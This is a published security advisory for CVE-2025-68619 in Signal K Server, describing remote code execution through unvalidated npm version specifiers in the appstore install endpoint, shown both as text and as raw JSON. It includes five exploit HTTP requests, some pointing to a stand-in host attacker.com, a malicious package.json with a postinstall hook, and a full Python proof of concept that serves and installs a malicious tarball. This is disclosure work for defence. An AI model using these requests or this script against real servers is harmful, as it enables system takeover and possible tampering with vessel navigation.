GHSA-93JC-VQQC-VVVH

Vulnerability from github – Published: 2026-01-02 15:23 – Updated: 2026-01-02 15:23
VLAI?
Summary
Signal K Server Vulnerable to Remote Code Execution via Malicious npm Package
Details

The SignalK appstore interface allows administrators to install npm packages through a REST API endpoint. While the endpoint validates that the package name exists in the npm registry as a known plugin or webapp, the version parameter accepts arbitrary npm version specifiers including URLs. npm supports installing packages from git repositories, GitHub shorthand syntax, and HTTP/HTTPS URLs pointing to tarballs. When npm installs a package, it can automatically execute any postinstall script defined in package.json, enabling arbitrary code execution.

The vulnerability exists because npm's version specifier syntax is extremely flexible, and the SignalK code passes the version parameter directly to npm without sanitization. An attacker with admin access can install a package from an attacker-controlled source containing a malicious postinstall script.

Affected Code

File: src/interfaces/appstore.js (lines 46-76)

app.post(
  [
    `${SERVERROUTESPREFIX}/appstore/install/:name/:version`,
    `${SERVERROUTESPREFIX}/appstore/install/:org/:name/:version`
  ],
  (req, res) => {
    let name = req.params.name
    const version = req.params.version  // No validation on version format

    // ... validation only checks if package name exists ...

    installSKModule(name, version)  // Passes unsanitized version to npm
  }
)

File: src/modules.ts (lines 180-205)

if (name) {
  packageString = version ? `${name}@${version}` : name  // Direct concatenation
}

if (process.platform === 'win32') {
  npm = spawn('cmd', ['/c', `npm --save ${command} ${packageString}`], opts)
} else {
  npm = spawn('npm', ['--save', command, packageString], opts)
}

Impact

An attacker with admin credentials (obtained via the authentication bypass chain) can execute arbitrary commands on the server with the privileges of the SignalK process. This enables complete system compromise including data theft, backdoor installation, lateral movement, and denial of service.

A compromised server can inject malicious PGN messages onto the NMEA 2000 bus or forge NMEA 0183 sentences, affecting all connected devices. Attack scenarios include manipulating autopilot systems (Pypilot, Raymarine, Garmin) via the Autopilot API to alter vessel course, spoofing AIS messages to create phantom vessels on radar, altering GPS position data sent to chart plotters and autopilots, injecting false depth sounder readings, manipulating wind instrument data, or sending shutdown commands to electronically controlled engines via NMEA 2000. Many vessels expose SignalK to the internet for remote monitoring, making them globally accessible to attackers.

The vulnerability can be exploited using any of npm's flexible version specifier formats:

1. Real npm Package with Required Keyword

POST /skServer/appstore/install/malicious-signalk-plugin/1.0.0 HTTP/1.1
Host: localhost:3000
Authorization: Bearer <VALID_AUTH_TOKEN>
Content-Length: 0

Publishing a malicious package to the official npm registry with the signalk-node-server-plugin or signalk-webapp keyword allows us to install arbitrary npm packages using standard semantic versioning format (1.0.0). This is non-stealthy as the package is publicly visible, but can be leveraged to spread malware via npm's ecosystem, since such a package will show up on the webapp feed and other users might install it.

2. Real npm Package via npm Alias

POST /skServer/appstore/install/signalk-pushover-plugin/npm:malicious-package@1.0.0 HTTP/1.1
Host: localhost:3000
Authorization: Bearer <VALID_AUTH_TOKEN>
Content-Length: 0

The npm: prefix allows installing a package under a different name. For example, npm:malicious-package@1.0.0 installs malicious-package but references it as if it were the legitimate signalk-pushover-plugin. This obscures the actual package being installed from casual inspection, making it stealthier while still requiring npm publishing.

3. Package Hosted on GitHub (GitHub Shorthand)

POST /skServer/appstore/install/signalk-pushover-plugin/attacker%2Fmalicious-plugin HTTP/1.1
Host: localhost:3000
Authorization: Bearer <VALID_AUTH_TOKEN>
Content-Length: 0

The format username/repo (URL-encoded as attacker%2Fmalicious-plugin) is shorthand for github:username/repo. npm automatically fetches the repository from GitHub, extracts it, and runs npm install. If the repo contains a postinstall script, it executes. The repository must contain a valid package.json with the malicious script.

4. Package Hosted on Attacker-Controlled Git Server (git+ Protocol)

POST /skServer/appstore/install/signalk-pushover-plugin/git%2Bhttps:%2F%2Fattacker.com%2Fmalicious-plugin.git HTTP/1.1
Host: localhost:3000
Authorization: Bearer <VALID_AUTH_TOKEN>
Content-Length: 0

The git+https:// or git+ssh:// prefix tells npm to clone a git repository. This works with any git server, not just GitHub. The attacker has full control over the repository contents and can update it at any time. This provides maximum control over the package source without relying on third-party services.

5. Package Hosted on Attacker Webserver as Tarball

POST /skServer/appstore/install/signalk-pushover-plugin/http:%2F%2Fattacker.com%2Fpkg.tgz HTTP/1.1
Host: localhost:3000
Authorization: Bearer <VALID_AUTH_TOKEN>
Content-Length: 0

The http:// or https:// URL pointing to a .tgz file tells npm to download and extract the tarball. This is the most flexible method as it requires no external service dependencies - the attacker controls both the package contents and the hosting infrastructure. No git repository or npm registry account needed.

All methods result in npm executing the postinstall script from the attacker-controlled package. A malicious npm package requires only two files to achieve RCE:

package.json - Defines the package metadata and the malicious script:

{
  "name": "signalk-evil-plugin",
  "version": "1.0.0",
  "keywords": ["signalk-node-server-plugin"],
  "scripts": {
    "postinstall": "node -e \"require('child_process').exec('calc.exe')\""
  }
}

The postinstall script executes automatically after npm installs the package.

index.js - Minimal plugin implementation to avoid errors:

module.exports = function(app) {
  return {
    id: 'evil-plugin',
    name: 'Evil Plugin',
    start: function() {},
    stop: function() {}
  }
}

PoC using the tarball variant of the exploit

import requests
import tarfile
import json
import io
import threading
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.parse import quote

TARGET = "http://localhost:3000"
ATTACKER_IP = "localhost"
ATTACKER_PORT = 9999
RCE_COMMAND = "calc.exe"  # Windows; use "id > /tmp/pwned" for Linux
TOKEN = "<VALID_AUTH_TOKEN>"

def create_malicious_tarball():
    package_json = {
        "name": "signalk-evil-plugin",
        "version": "1.0.0",
        "keywords": ["signalk-node-server-plugin"],
        "scripts": {
            "postinstall": f"node -e \"require('child_process').exec('{RCE_COMMAND}')\""
        }
    }

    index_js = b"module.exports = function(app) { return { id: 'evil', start: function(){}, stop: function(){} } }"

    tar_buffer = io.BytesIO()
    with tarfile.open(fileobj=tar_buffer, mode='w:gz') as tar:
        # Add package.json
        pkg_data = json.dumps(package_json, indent=2).encode()
        pkg_info = tarfile.TarInfo(name="package/package.json")
        pkg_info.size = len(pkg_data)
        tar.addfile(pkg_info, io.BytesIO(pkg_data))

        # Add index.js
        idx_info = tarfile.TarInfo(name="package/index.js")
        idx_info.size = len(index_js)
        tar.addfile(idx_info, io.BytesIO(index_js))

    return tar_buffer.getvalue()

def start_malicious_server(tarball_data):
    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            print(f"[+] Victim fetched malicious package!")
            self.send_response(200)
            self.send_header("Content-Type", "application/gzip")
            self.send_header("Content-Length", len(tarball_data))
            self.end_headers()
            self.wfile.write(tarball_data)

        def log_message(self, *args):
            pass

    server = HTTPServer(("0.0.0.0", ATTACKER_PORT), Handler)
    thread = threading.Thread(target=server.serve_forever, daemon=True)
    thread.start()
    print(f"[+] Malicious server running on port {ATTACKER_PORT}")
    return server

def trigger_rce(token):
    tarball_url = f"http://{ATTACKER_IP}:{ATTACKER_PORT}/package.tgz"
    encoded_url = quote(tarball_url, safe='')

    url = f"{TARGET}/skServer/appstore/install/signalk-pushover-plugin/{encoded_url}"

    headers = {"Authorization": f"Bearer {token}"}

    print(f"[*] Triggering installation from {tarball_url}")
    r = requests.post(url, headers=headers)
    print(f"[+] Response: {r.status_code} - {r.text}")

if __name__ == "__main__":
    tarball = create_malicious_tarball()
    print(f"[+] Created malicious tarball ({len(tarball)} bytes)")

    start_malicious_server(tarball)
    trigger_rce(TOKEN)

Recommendation

  1. Restrict package installation to the official npm registry only by validating that version parameters match semver format
  2. Use npm's --ignore-scripts flag to prevent automatic script execution
  3. Implement an allowlist of approved packages
  4. Consider sandboxing the package installation process

While we understand that allowing 3rd party plugin installation is an intended functionality we believe that more secure practices must be applied to the whole process given the operational importance a SignalK instance can have onboard a vessel and it's rise in polularity.

Severity ?
7.3 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "signalk-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.9.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-68619"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-02T15:23:39Z",
    "nvd_published_at": "2026-01-01T19:15:53Z",
    "severity": "HIGH"
  },
  "details": "The SignalK appstore interface allows administrators to install npm packages through a REST API endpoint. While the endpoint validates that the package name exists in the npm registry as a known plugin or webapp, the version parameter accepts arbitrary npm version specifiers including URLs. npm supports installing packages from git repositories, GitHub shorthand syntax, and HTTP/HTTPS URLs pointing to tarballs. When npm installs a package, it can automatically execute any `postinstall` script defined in `package.json`, enabling arbitrary code execution.\n\nThe vulnerability exists because npm\u0027s version specifier syntax is extremely flexible, and the SignalK code passes the version parameter directly to npm without sanitization. An attacker with admin access can install a package from an attacker-controlled source containing a malicious `postinstall` script.\n\n### Affected Code\n\n**File**: `src/interfaces/appstore.js` (lines 46-76)\n\n```javascript\napp.post(\n  [\n    `${SERVERROUTESPREFIX}/appstore/install/:name/:version`,\n    `${SERVERROUTESPREFIX}/appstore/install/:org/:name/:version`\n  ],\n  (req, res) =\u003e {\n    let name = req.params.name\n    const version = req.params.version  // No validation on version format\n    \n    // ... validation only checks if package name exists ...\n    \n    installSKModule(name, version)  // Passes unsanitized version to npm\n  }\n)\n```\n\n**File**: `src/modules.ts` (lines 180-205)\n\n```typescript\nif (name) {\n  packageString = version ? `${name}@${version}` : name  // Direct concatenation\n}\n\nif (process.platform === \u0027win32\u0027) {\n  npm = spawn(\u0027cmd\u0027, [\u0027/c\u0027, `npm --save ${command} ${packageString}`], opts)\n} else {\n  npm = spawn(\u0027npm\u0027, [\u0027--save\u0027, command, packageString], opts)\n}\n```\n\n### Impact\n\nAn attacker with admin credentials (obtained via the authentication bypass chain) can execute arbitrary commands on the server with the privileges of the SignalK process. This enables complete system compromise including data theft, backdoor installation, lateral movement, and denial of service.\n\nA compromised server can inject malicious PGN messages onto the NMEA 2000 bus or forge NMEA 0183 sentences, affecting all connected devices. Attack scenarios include manipulating autopilot systems (Pypilot, Raymarine, Garmin) via the Autopilot API to alter vessel course, spoofing AIS messages to create phantom vessels on radar, altering GPS position data sent to chart plotters and autopilots, injecting false depth sounder readings, manipulating wind instrument data, or sending shutdown commands to electronically controlled engines via NMEA 2000. Many vessels expose SignalK to the internet for remote monitoring, making them globally accessible to attackers.\n\nThe vulnerability can be exploited using any of npm\u0027s flexible version specifier formats:\n\n**1. Real npm Package with Required Keyword**\n\n```http\nPOST /skServer/appstore/install/malicious-signalk-plugin/1.0.0 HTTP/1.1\nHost: localhost:3000\nAuthorization: Bearer \u003cVALID_AUTH_TOKEN\u003e\nContent-Length: 0\n```\n\nPublishing a malicious package to the official npm registry with the `signalk-node-server-plugin` or `signalk-webapp` keyword allows us to install arbitrary npm packages using standard semantic versioning format (`1.0.0`). This is non-stealthy as the package is publicly visible, but can be leveraged to spread malware via npm\u0027s ecosystem, since such a package will show up on the webapp feed and other users might install it.\n\n**2. Real npm Package via npm Alias**\n\n```http\nPOST /skServer/appstore/install/signalk-pushover-plugin/npm:malicious-package@1.0.0 HTTP/1.1\nHost: localhost:3000\nAuthorization: Bearer \u003cVALID_AUTH_TOKEN\u003e\nContent-Length: 0\n```\n\nThe `npm:` prefix allows installing a package under a different name. For example, `npm:malicious-package@1.0.0` installs `malicious-package` but references it as if it were the legitimate `signalk-pushover-plugin`. This obscures the actual package being installed from casual inspection, making it stealthier while still requiring npm publishing.\n\n**3. Package Hosted on GitHub (GitHub Shorthand)**\n\n```http\nPOST /skServer/appstore/install/signalk-pushover-plugin/attacker%2Fmalicious-plugin HTTP/1.1\nHost: localhost:3000\nAuthorization: Bearer \u003cVALID_AUTH_TOKEN\u003e\nContent-Length: 0\n```\n\nThe format `username/repo` (URL-encoded as `attacker%2Fmalicious-plugin`) is shorthand for `github:username/repo`. npm automatically fetches the repository from GitHub, extracts it, and runs `npm install`. If the repo contains a `postinstall` script, it executes. The repository must contain a valid `package.json` with the malicious script.\n\n**4. Package Hosted on Attacker-Controlled Git Server (git+ Protocol)**\n\n```http\nPOST /skServer/appstore/install/signalk-pushover-plugin/git%2Bhttps:%2F%2Fattacker.com%2Fmalicious-plugin.git HTTP/1.1\nHost: localhost:3000\nAuthorization: Bearer \u003cVALID_AUTH_TOKEN\u003e\nContent-Length: 0\n```\n\nThe `git+https://` or `git+ssh://` prefix tells npm to clone a git repository. This works with any git server, not just GitHub. The attacker has full control over the repository contents and can update it at any time. This provides maximum control over the package source without relying on third-party services.\n\n**5. Package Hosted on Attacker Webserver as Tarball**\n\n```http\nPOST /skServer/appstore/install/signalk-pushover-plugin/http:%2F%2Fattacker.com%2Fpkg.tgz HTTP/1.1\nHost: localhost:3000\nAuthorization: Bearer \u003cVALID_AUTH_TOKEN\u003e\nContent-Length: 0\n```\n\nThe `http://` or `https://` URL pointing to a `.tgz` file tells npm to download and extract the tarball. This is the most flexible method as it requires no external service dependencies - the attacker controls both the package contents and the hosting infrastructure. No git repository or npm registry account needed.\n\nAll methods result in npm executing the `postinstall` script from the attacker-controlled package. A malicious npm package requires only two files to achieve RCE:\n\n**package.json** - Defines the package metadata and the malicious script:\n```json\n{\n  \"name\": \"signalk-evil-plugin\",\n  \"version\": \"1.0.0\",\n  \"keywords\": [\"signalk-node-server-plugin\"],\n  \"scripts\": {\n    \"postinstall\": \"node -e \\\"require(\u0027child_process\u0027).exec(\u0027calc.exe\u0027)\\\"\"\n  }\n}\n```\n\nThe `postinstall` script executes automatically after npm installs the package.\n\n**index.js** - Minimal plugin implementation to avoid errors:\n```javascript\nmodule.exports = function(app) {\n  return {\n    id: \u0027evil-plugin\u0027,\n    name: \u0027Evil Plugin\u0027,\n    start: function() {},\n    stop: function() {}\n  }\n}\n```\n\n### PoC using the tarball variant of the exploit\n\n```python\nimport requests\nimport tarfile\nimport json\nimport io\nimport threading\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\nfrom urllib.parse import quote\n\nTARGET = \"http://localhost:3000\"\nATTACKER_IP = \"localhost\"\nATTACKER_PORT = 9999\nRCE_COMMAND = \"calc.exe\"  # Windows; use \"id \u003e /tmp/pwned\" for Linux\nTOKEN = \"\u003cVALID_AUTH_TOKEN\u003e\"\n\ndef create_malicious_tarball():\n    package_json = {\n        \"name\": \"signalk-evil-plugin\",\n        \"version\": \"1.0.0\",\n        \"keywords\": [\"signalk-node-server-plugin\"],\n        \"scripts\": {\n            \"postinstall\": f\"node -e \\\"require(\u0027child_process\u0027).exec(\u0027{RCE_COMMAND}\u0027)\\\"\"\n        }\n    }\n    \n    index_js = b\"module.exports = function(app) { return { id: \u0027evil\u0027, start: function(){}, stop: function(){} } }\"\n    \n    tar_buffer = io.BytesIO()\n    with tarfile.open(fileobj=tar_buffer, mode=\u0027w:gz\u0027) as tar:\n        # Add package.json\n        pkg_data = json.dumps(package_json, indent=2).encode()\n        pkg_info = tarfile.TarInfo(name=\"package/package.json\")\n        pkg_info.size = len(pkg_data)\n        tar.addfile(pkg_info, io.BytesIO(pkg_data))\n        \n        # Add index.js\n        idx_info = tarfile.TarInfo(name=\"package/index.js\")\n        idx_info.size = len(index_js)\n        tar.addfile(idx_info, io.BytesIO(index_js))\n    \n    return tar_buffer.getvalue()\n\ndef start_malicious_server(tarball_data):\n    class Handler(BaseHTTPRequestHandler):\n        def do_GET(self):\n            print(f\"[+] Victim fetched malicious package!\")\n            self.send_response(200)\n            self.send_header(\"Content-Type\", \"application/gzip\")\n            self.send_header(\"Content-Length\", len(tarball_data))\n            self.end_headers()\n            self.wfile.write(tarball_data)\n        \n        def log_message(self, *args):\n            pass\n    \n    server = HTTPServer((\"0.0.0.0\", ATTACKER_PORT), Handler)\n    thread = threading.Thread(target=server.serve_forever, daemon=True)\n    thread.start()\n    print(f\"[+] Malicious server running on port {ATTACKER_PORT}\")\n    return server\n\ndef trigger_rce(token):\n    tarball_url = f\"http://{ATTACKER_IP}:{ATTACKER_PORT}/package.tgz\"\n    encoded_url = quote(tarball_url, safe=\u0027\u0027)\n    \n    url = f\"{TARGET}/skServer/appstore/install/signalk-pushover-plugin/{encoded_url}\"\n    \n    headers = {\"Authorization\": f\"Bearer {token}\"}\n    \n    print(f\"[*] Triggering installation from {tarball_url}\")\n    r = requests.post(url, headers=headers)\n    print(f\"[+] Response: {r.status_code} - {r.text}\")\n\nif __name__ == \"__main__\":\n    tarball = create_malicious_tarball()\n    print(f\"[+] Created malicious tarball ({len(tarball)} bytes)\")\n    \n    start_malicious_server(tarball)\n    trigger_rce(TOKEN)\n```\n\n### Recommendation\n\n1. Restrict package installation to the official npm registry only by validating that version parameters match semver format\n2. Use npm\u0027s `--ignore-scripts` flag to prevent automatic script execution\n3. Implement an allowlist of approved packages\n4. Consider sandboxing the package installation process\n\nWhile we understand that allowing 3rd party plugin installation is an intended functionality we believe that more secure practices must be applied to the whole process given the operational importance a SignalK instance can have onboard a vessel and it\u0027s rise in polularity.",
  "id": "GHSA-93jc-vqqc-vvvh",
  "modified": "2026-01-02T15:23:39Z",
  "published": "2026-01-02T15:23:39Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-93jc-vqqc-vvvh"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68619"
    },
    {
      "type": "WEB",
      "url": "https://github.com/SignalK/signalk-server/commit/f06140bed702de93a5dbb6b33dc2486960764d1d"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/SignalK/signalk-server"
    },
    {
      "type": "WEB",
      "url": "https://github.com/SignalK/signalk-server/releases/tag/v2.19.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Signal K Server Vulnerable to Remote Code Execution via Malicious npm Package"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.